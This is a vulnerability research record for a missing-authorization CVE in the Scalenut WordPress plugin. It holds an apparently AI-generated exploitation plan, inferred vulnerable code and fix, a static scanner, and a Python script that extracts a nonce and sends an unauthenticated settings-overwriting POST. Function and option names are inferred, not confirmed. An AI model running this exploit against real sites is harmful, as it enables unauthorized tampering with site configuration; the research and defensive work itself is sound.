# CVE-2025-68882: Scalenut <= 1.1.3 - Missing Authorization

**Record metadata**

- Plugin: `scalenut` (WordPress plugin; source tags: https://plugins.trac.wordpress.org/browser/scalenut/tags)
- Affected versions: <= 1.1.3
- Patched in version: not recorded
- Severity: medium, CVSS 5.3 (`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N`)
- Vulnerability type: Missing Authorization
- Published: 2026-01-20; updated: 2026-01-27 19:17:42
- Reference: https://www.wordfence.com/threat-intel/vulnerabilities/id/d0a8c924-04f7-47e7-ba84-f090abc7279a?source=api-prod
- Vendor patch diff: none recorded (no Trac changeset linked)
- Research status: researched (3 rounds, not verified against the plugin source); model `gemini-3-flash-preview`; started 2026-05-05 05:19:34, completed 2026-05-05 05:19:53
- Proof of concept: none recorded (no PoC video, steps, script, exploit code or trace)

## Description

The Scalenut plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.1.3. This makes it possible for unauthenticated attackers to perform an unauthorized action.

The CVSS vector (`PR:N`, `C:N/I:L/A:N`) describes an action reachable over the network without any account, with limited integrity impact and no confidentiality or availability impact. The advisory names neither the function nor the action. Everything marked "inferred" in the research plan, code and diff below was derived from the plugin's general functionality by the research pass and has not been confirmed against the source.

## Exploitation Research Plan - CVE-2025-68882 (Scalenut)

### 1. Vulnerability Summary

The **Scalenut** plugin (up to version 1.1.3) for WordPress contains a missing authorization vulnerability. Specifically, a function reachable without authentication (most likely an AJAX handler registered via `wp_ajax_nopriv_`) performs no adequate capability check (e.g., `current_user_can('manage_options')`). This lets an unauthenticated attacker invoke an administrative action such as updating the plugin's configuration or its stored Scalenut API key. The advisory rates the impact as limited integrity loss (`I:L`); whether the writable setting gives further leverage over the site's Scalenut integration depends on what the handler actually writes, which is not confirmed.

### 2. Attack Vector Analysis

- **Endpoint**: `/wp-admin/admin-ajax.php`
- **Action**: `scalenut_save_settings` or `scalenut_update_api_token` (inferred from plugin functionality; to be verified in source)
- **HTTP Method**: POST
- **Payload Parameters**:
  - `action`: the vulnerable AJAX action name
  - `nonce`: the nonce, if the handler verifies one
  - `scalenut_api_key` or `token`: the attacker-chosen value to write into the site settings
- **Authentication**: none required (unauthenticated)
- **Preconditions**: the plugin must be active

### 3. Code Flow

1. **Registration**: the plugin registers an AJAX action for unauthenticated users:
   `add_action('wp_ajax_nopriv_scalenut_save_settings', array($this, 'scalenut_save_settings'));` (inferred)
2. **Invocation**: an attacker sends a POST request to `admin-ajax.php` with `action=scalenut_save_settings`.
3. **Execution**: the `scalenut_save_settings` function is called.
4. **Failure Point**: the function may verify a nonce but does **not** check `current_user_can('manage_options')`. A nonce is not an authorization control: for a `wp_ajax_nopriv_` handler it is minted for anonymous visitors and printed into the page, so verifying it only shows that the request came from the site's own frontend.
5. **Sink**: the function calls `update_option('scalenut_settings', ...)` or `update_option('scalenut_api_key', ...)` with user-supplied input from `$_POST`.

### 4. Nonce Acquisition Strategy

If the handler uses `check_ajax_referer` or `wp_verify_nonce`, the nonce must be extracted from the frontend.

1. **Identify Script Localization**: look for `wp_localize_script` in the plugin source (likely in `inc/class-scalenut.php` or `admin/class-scalenut-admin.php`).
2. **Localization Keys**: find the JavaScript object name and key (e.g., `scalenut_ajax_object.nonce`).
3. **Extraction**:
   - **Step A**: create a post or page so that the plugin's frontend scripts are loaded if they are enqueued conditionally:
     `wp post create --post_type=page --post_status=publish --post_title="Scalenut Proof" --post_content="[scalenut_content]"` (shortcode inferred)
   - **Step B**: use the research harness's `browser_navigate` tool to visit the page.
   - **Step C**: use `browser_eval` to read the nonce:
     `browser_eval("window.scalenut_ajax_object?.nonce")` (object name inferred)

*Note: when a handler is registered under `wp_ajax_nopriv_`, its nonce is normally exposed to unauthenticated visitors so that legitimate frontend requests can carry it.*

### 5. Exploitation Strategy

Once the vulnerable action and any required nonce are identified:

1. **Construct the POST Request**:
   - **URL**: `http://localhost:8080/wp-admin/admin-ajax.php`
   - **Headers**: `Content-Type: application/x-www-form-urlencoded`
   - **Body**: `action=scalenut_save_settings&nonce=[NONCE]&api_key=pwned_key&settings[option_name]=malicious_value` (parameter names inferred)

2. **Send via the harness's `http_request` tool**:

```json
{
  "method": "POST",
  "url": "http://localhost:8080/wp-admin/admin-ajax.php",
  "headers": {
    "Content-Type": "application/x-www-form-urlencoded"
  },
  "body": "action=scalenut_save_settings&nonce=abc123def4&api_key=pwned_key"
}
```

### 6. Test Data Setup

1. **Install Plugin**: ensure Scalenut 1.1.3 is installed and active.
2. **Initial State**: record the current API key so the change can be proven:
   `wp option get scalenut_api_key` (option name inferred)
3. **Public Page**: if a nonce is required, publish a page that enqueues the Scalenut script (section 4, Step A).

### 7. Expected Results

- The AJAX request returns `200 OK`, typically with the JSON body `{"success": true}` from `wp_send_json_success()`.
- If the body is `0`, `admin-ajax.php` found no handler for the action name (wrong or login-only action); if it is `-1`, `check_ajax_referer` rejected the nonce.
- The WordPress database now holds the attacker-controlled value.

### 8. Verification Steps

1. **Check Database**: confirm the option changed with WP-CLI:
   - `wp option get scalenut_api_key`
   - Expected result: `pwned_key`
2. **Admin UI Check**: log in as an administrator and open the Scalenut settings page; the injected value appears in the "API Key" or "Settings" field.

### 9. Alternative Approaches

- **Missing Nonce Check**: if `check_ajax_referer` is absent altogether, the exploit is a direct POST with no "Nonce Acquisition" step.
- **REST API Endpoint**: search for `register_rest_route` calls whose `permission_callback` is missing or always returns `true` (e.g., `'__return_true'`).
  - Path: `/wp-json/scalenut/v1/save-settings` (inferred)
  - Exploit via `http_request` to the REST path.
- **Settings API / admin-post.php**: if the plugin registers settings via `register_setting` but also exposes its own save path through `admin-post.php` (`admin_post_nopriv_*`) or `admin-ajax.php` without a capability check, the same write is reachable there.

## Research Summary

The Scalenut plugin for WordPress (up to version 1.1.3) is vulnerable to unauthorized setting modification due to a missing capability check in its AJAX handlers. This allows unauthenticated attackers to update sensitive plugin configuration, such as API keys, by sending a request to the `admin-ajax.php` endpoint. (Inferred; the handler and option names are not confirmed.)

## Vulnerable Code (inferred)

Both snippets were inferred by the research pass and are not taken from the plugin. Note that this reconstruction has no nonce check at all; if the real handler does call `check_ajax_referer`, the nonce must be obtained as in section 4 of the plan.

```php
// Inferred registration in the plugin
add_action('wp_ajax_nopriv_scalenut_save_settings', array($this, 'scalenut_save_settings'));
```

```php
// Inferred handler function missing authorization checks
public function scalenut_save_settings() {
    // Potential failure point: missing current_user_can('manage_options') check
    if (isset($_POST['api_key'])) {
        update_option('scalenut_api_key', sanitize_text_field($_POST['api_key']));
    }
    wp_send_json_success();
}
```

## Exploit Outline

1. Access the site's frontend and locate localized JavaScript objects (e.g., via `wp_localize_script`) to extract the required AJAX nonce if the handler implements `check_ajax_referer`.
2. Construct an unauthenticated HTTP POST request targeting `/wp-admin/admin-ajax.php`.
3. Set the `action` parameter to `scalenut_save_settings` (or the specific vulnerable AJAX action name).
4. Include the extracted nonce and the payload, such as a new `api_key` or modified plugin configuration settings, in the POST body.
5. Send the request to overwrite the site's Scalenut integration settings without administrative privileges.

## Fix Diff (inferred)

No vendor changeset is recorded for this issue; the diff below is the research pass's inferred shape of the fix, not the plugin's actual change.

```diff
--- a/inc/class-scalenut-admin.php
+++ b/inc/class-scalenut-admin.php
@@ -10,6 +10,10 @@
 public function scalenut_save_settings() {
+    if ( ! current_user_can( 'manage_options' ) ) {
+        wp_die( 'Unauthorized' );
+    }
     if (isset($_POST['api_key'])) {
         update_option('scalenut_api_key', sanitize_text_field($_POST['api_key']));
     }
     wp_send_json_success();
 }
```
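Review bot: the guard added at the top of `scalenut_save_settings()` stops anonymous writes but answers with `wp_die( 'Unauthorized' )`, a plain-text body, where the handler's success path speaks JSON through `wp_send_json_success()`; use `wp_send_json_error( 'Unauthorized', 403 )` so the caller and any monitoring see a JSON error with a 403 status. Nothing in the shown context verifies a nonce either, so after the capability check the handler is still reachable cross-site from an administrator's browser; add `check_ajax_referer( 'scalenut_nonce', 'nonce' );` (action name assumed) below the capability check, and drop the `wp_ajax_nopriv_` registration the plan infers if anonymous callers have no legitimate use for this action. Also, the hunk header counts 6 context lines plus 3 additions, so `@@ -10,6 +10,10 @@` should read `@@ -10,6 +10,9 @@`; harmless while the diff is inferred and not applied, but it will not apply cleanly if it is ever turned into a real patch.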
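Sections 2, 3 and 9 of the plan leave the affected entry point as an inferred name "to be verified in source". The script below is an added example (not Scalenut's code and not part of the original research record) of how to do that verification statically: it lists every `wp_ajax_nopriv_` registration and every `register_rest_route` call in a plugin file, locates each handler body, and reports which ones reach an `update_option`-style sink without any `current_user_can`-style check. It assumes the stock WordPress idioms the plan describes; `SAMPLE_PHP` is a constructed stand-in for a plugin source file, and the class, method and route names in it are invented for the demonstration.

```python
"""Static triage for unauthenticated WordPress entry points (added example, not plugin code).

Assumes the idioms the research plan describes:
  - AJAX handlers registered with add_action('wp_ajax_nopriv_<action>', <handler>)
  - REST routes registered with register_rest_route(..., 'permission_callback' => ...)
SAMPLE_PHP is a constructed stand-in for a plugin file; nothing in it is Scalenut source.
"""
import re

SAMPLE_PHP = r'''<?php
class Sample_Plugin_Admin {
    public function __construct() {
        add_action('wp_ajax_nopriv_scalenut_save_settings', array($this, 'scalenut_save_settings'));
        add_action('wp_ajax_scalenut_save_settings', array($this, 'scalenut_save_settings'));
        add_action('wp_ajax_nopriv_scalenut_ping', array($this, 'ping'));
        add_action('rest_api_init', array($this, 'routes'));
    }
    public function routes() {
        register_rest_route('scalenut/v1', '/save-settings', array(
            'methods' => 'POST', 'callback' => array($this, 'rest_save'),
            'permission_callback' => '__return_true',
        ));
        register_rest_route('scalenut/v1', '/status', array(
            'methods' => 'GET', 'callback' => array($this, 'rest_status'),
            'permission_callback' => function () { return current_user_can('manage_options'); },
        ));
    }
    public function scalenut_save_settings() {
        check_ajax_referer('scalenut_nonce', 'nonce');   // CSRF token only, no capability check
        if (isset($_POST['api_key'])) {
            update_option('scalenut_api_key', sanitize_text_field($_POST['api_key']));
        }
        wp_send_json_success();
    }
    public function ping() {
        if (!current_user_can('manage_options')) {
            wp_send_json_error('forbidden', 403);
        }
        wp_send_json_success('pong');
    }
}
'''

# add_action('wp_ajax_nopriv_<action>', array($this, 'm') | [$this, 'm'] | 'func')
AJAX_NOPRIV_RE = re.compile(
    r"""add_action\(\s*['"]wp_ajax_nopriv_(\w+)['"]\s*,\s*(?:"""
    r"""array\(\s*\$this\s*,\s*['"](\w+)['"]\s*\)|\[\s*\$this\s*,\s*['"](\w+)['"]\s*\]|['"](\w+)['"])""")
CAP_RE = re.compile(r"\b(?:current_user_can|user_can|is_super_admin)\s*\(")
NONCE_RE = re.compile(r"\b(?:check_ajax_referer|check_admin_referer|wp_verify_nonce)\s*\(")
SINK_RE = re.compile(r"\b(?:update_option|add_option|delete_option|update_site_option)\s*\(")
PERM_RE = re.compile(r"""['"]permission_callback['"]\s*=>\s*""")


def _balanced(src, start, open_ch, close_ch):
    """src[start:] up to the delimiter matching src[start] (naive: ignores delimiters inside strings)."""
    depth = 0
    for i in range(start, len(src)):
        if src[i] == open_ch:
            depth += 1
        elif src[i] == close_ch:
            depth -= 1
            if depth == 0:
                return src[start:i + 1]
    raise ValueError("unbalanced delimiters")


def method_body(php, name):
    """Body of `function <name>(...) { ... }`, or None if the file does not define it."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\(", php)
    if not m:
        return None
    return _balanced(php, php.index("{", m.end()), "{", "}")


def find_nopriv_handlers(php):
    """(action, handler) pairs for every wp_ajax_nopriv_ registration."""
    return [(m.group(1), next(g for g in m.groups()[1:] if g)) for m in AJAX_NOPRIV_RE.finditer(php)]


def find_rest_routes(php):
    """Each register_rest_route call with a verdict on its permission_callback."""
    routes = []
    for m in re.finditer(r"register_rest_route\s*\(", php):
        call = _balanced(php, m.end() - 1, "(", ")")
        namespace, route = re.findall(r"""['"]([^'"]*)['"]""", call)[:2]
        pm = PERM_RE.search(call)
        if pm is None:
            verdict = "missing"
        elif re.match(r"""['"]__return_true['"]|function\s*\([^)]*\)\s*\{\s*return\s+true\s*;""", call[pm.end():]):
            verdict = "always_true"
        else:
            verdict = "present"
        routes.append({"kind": "rest", "route": namespace + route,
                       "permission_callback": verdict, "permissive": verdict != "present"})
    return routes


def triage(php):
    """Every anonymous-reachable entry point with what its handler body does and does not check."""
    findings = []
    for action, handler in find_nopriv_handlers(php):
        body = method_body(php, handler) or ""
        findings.append({"kind": "ajax_nopriv", "action": action, "handler": handler,
                         "capability_check": bool(CAP_RE.search(body)),
                         "nonce_check": bool(NONCE_RE.search(body)),
                         "writes_options": bool(SINK_RE.search(body))})
    return findings + find_rest_routes(php)


def suspicious(findings):
    """nopriv handlers that hit an option-write sink without a capability check, plus permissive REST routes."""
    return [f for f in findings
            if (f["kind"] == "ajax_nopriv" and f["writes_options"] and not f["capability_check"])
            or (f["kind"] == "rest" and f["permissive"])]


if __name__ == "__main__":
    for f in suspicious(triage(SAMPLE_PHP)):
        print("SUSPICIOUS:", f)
```

Run it over each file under the plugin's tag directory (the `SAMPLE_PHP` string is the stand-in for that input); a `wp_ajax_nopriv_` handler that reports `nonce_check: True` but `capability_check: False` is exactly the shape section 3 of the plan describes, and a `wp_ajax_`-only handler that the script ignores is not reachable anonymously. The brace and parenthesis matching is deliberately naive and will be confused by delimiters inside string literals, so treat a hit as a lead to read by hand, not as a verdict.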
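Sections 4 to 8 of the plan and the exploit outline describe one procedure: read the nonce that `wp_localize_script()` prints into the page, build the `admin-ajax.php` POST, and interpret the reply before confirming the option with WP-CLI. The script below is an added example of that procedure (not Scalenut's code and not the research harness's `http_request`/`browser_eval` tooling). Its assumptions are the plan's inferred names, which are not confirmed: the action `scalenut_save_settings`, the localized object `scalenut_ajax_object` with key `nonce`, and the option `scalenut_api_key`. `SAMPLE_HTML` is a constructed page fragment shaped like `wp_localize_script()` output, not a capture from a real site, and the `run()` function is the only part that touches the network.

```python
"""Nonce extraction, request construction and reply parsing for the admin-ajax.php procedure.

Added example for this advisory, not plugin code. Inferred assumptions (as in the plan):
action `scalenut_save_settings`, localized object `scalenut_ajax_object.nonce`,
option `scalenut_api_key`. SAMPLE_HTML is constructed, not captured from a live site.
"""
import json
import re
from urllib.error import HTTPError
from urllib.parse import urlencode
from urllib.request import Request, urlopen

SAMPLE_HTML = r'''<html><head>
<script id="scalenut-js-extra">
var scalenut_ajax_object = {"ajax_url":"http:\/\/localhost:8080\/wp-admin\/admin-ajax.php","nonce":"abc123def4"};
</script></head><body>[scalenut_content]</body></html>'''


def extract_nonce(html, object_name="scalenut_ajax_object", key="nonce"):
    """Pull `key` from the `var <object_name> = {...};` block that wp_localize_script() prints.

    wp_localize_script() serialises its data with wp_json_encode(), so the object literal is
    valid JSON (forward slashes come out backslash-escaped) and json.loads handles it directly.
    """
    m = re.search(r"var\s+" + re.escape(object_name) + r"\s*=\s*(\{.*?\})\s*;", html, re.S)
    if m is None:
        return None
    return json.loads(m.group(1)).get(key)


def build_exploit_request(base_url, action, nonce=None, api_key="pwned_key"):
    """(url, headers, body) for the section 5 POST; `nonce` is omitted when the handler has no referer check."""
    fields = [("action", action)]
    if nonce is not None:
        fields.append(("nonce", nonce))
    fields.append(("api_key", api_key))
    return (base_url.rstrip("/") + "/wp-admin/admin-ajax.php",
            {"Content-Type": "application/x-www-form-urlencoded"},
            urlencode(fields))


def parse_ajax_response(raw):
    """Interpret an admin-ajax.php reply: JSON from wp_send_json_*, or the bare `0` / `-1` die() bodies."""
    text = raw.strip()
    if text == "0":
        return {"success": False, "error": "no handler for this action (wrong or login-only action)"}
    if text == "-1":
        return {"success": False, "error": "nonce rejected by check_ajax_referer()"}
    try:
        return json.loads(text)
    except json.JSONDecodeError:
        return {"success": False, "error": "non-JSON body", "body": text[:200]}


def verify_option_change(before, after, expected):
    """Section 8 check on two `wp option get scalenut_api_key` readings taken before and after the request."""
    return before != after and after == expected


def run(base_url, page_path="/scalenut-proof/", action="scalenut_save_settings", api_key="pwned_key"):
    """Live procedure against a lab site (network): fetch the page, pull the nonce, send the POST."""
    with urlopen(base_url.rstrip("/") + page_path) as resp:
        nonce = extract_nonce(resp.read().decode("utf-8", "replace"))
    url, headers, body = build_exploit_request(base_url, action, nonce, api_key)
    req = Request(url, data=body.encode(), headers=headers, method="POST")
    try:
        with urlopen(req) as resp:
            raw = resp.read().decode("utf-8", "replace")
    except HTTPError as err:  # admin-ajax.php answers 400 ("0") or 403 ("-1") on failure
        raw = err.read().decode("utf-8", "replace")
    return parse_ajax_response(raw)


if __name__ == "__main__":
    nonce = extract_nonce(SAMPLE_HTML)
    print(nonce)
    print(build_exploit_request("http://localhost:8080", "scalenut_save_settings", nonce))
    # Against a lab instance: print(run("http://localhost:8080")), then compare
    # `wp option get scalenut_api_key` before and after with verify_option_change().
```

`extract_nonce` parses the localized object as JSON rather than grepping for the key, so it also returns `ajax_url` or any other key the plugin localizes, and returns `None` when the script is not on the page (the conditional-enqueue case section 4 Step A works around). `parse_ajax_response` maps the two bare replies `admin-ajax.php` sends on failure to readable errors, which is the quickest way to tell a wrong action name from a rejected nonce.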